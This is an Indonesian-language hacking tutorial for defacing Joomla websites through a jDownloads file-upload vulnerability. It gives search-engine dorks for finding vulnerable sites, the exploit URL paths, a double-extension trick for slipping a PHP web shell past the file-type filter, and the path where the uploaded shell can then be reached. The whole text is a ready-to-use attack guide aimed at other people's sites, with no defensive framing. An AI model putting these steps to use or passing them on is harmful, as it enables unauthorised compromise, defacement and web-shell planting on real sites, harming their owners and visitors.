Tutorial Deface CMS Joomla dengan eXploit Jdownloads Shell Upload Vulnerability



Dork :
1.intext:"Powered by jDownloads"
2.intext:"submit file"
3.intext:"premited file type : jpg,png,gif"  
4.inurl:/Images/Jdownloads     
(gunakan imajinasimu, biar dapet yg vuln n verawan)

eXploit :
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload

Script Deface dengan ekstensi deface.html.j, deface.txt.j atau yang mau upload Shell silahkan siapkan shell.php.php.j

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jdownloads&Itemid=1&view=upload

3. Vulnerability ~ Muncul Form Seperti Gambar dibawah


4. Lalu isi data2 yang perlu, yang ada tanda merah di depan kotak Form., dan upload script deface atau shell kalian, contoh Gua upload file nue.php.php.j (upload dibagian screenshot)

5. Kalo sukses nanti Muncul icon +berwarna Hijau.

Note: gak semua file Shell bisa terbaca, jika tak terbaca langsung upload Script Deface kalean saja
6. File/Shell Akses: /images/jdownloads/screenshots/filelu

sumber : Tkj Cyber Art

Comments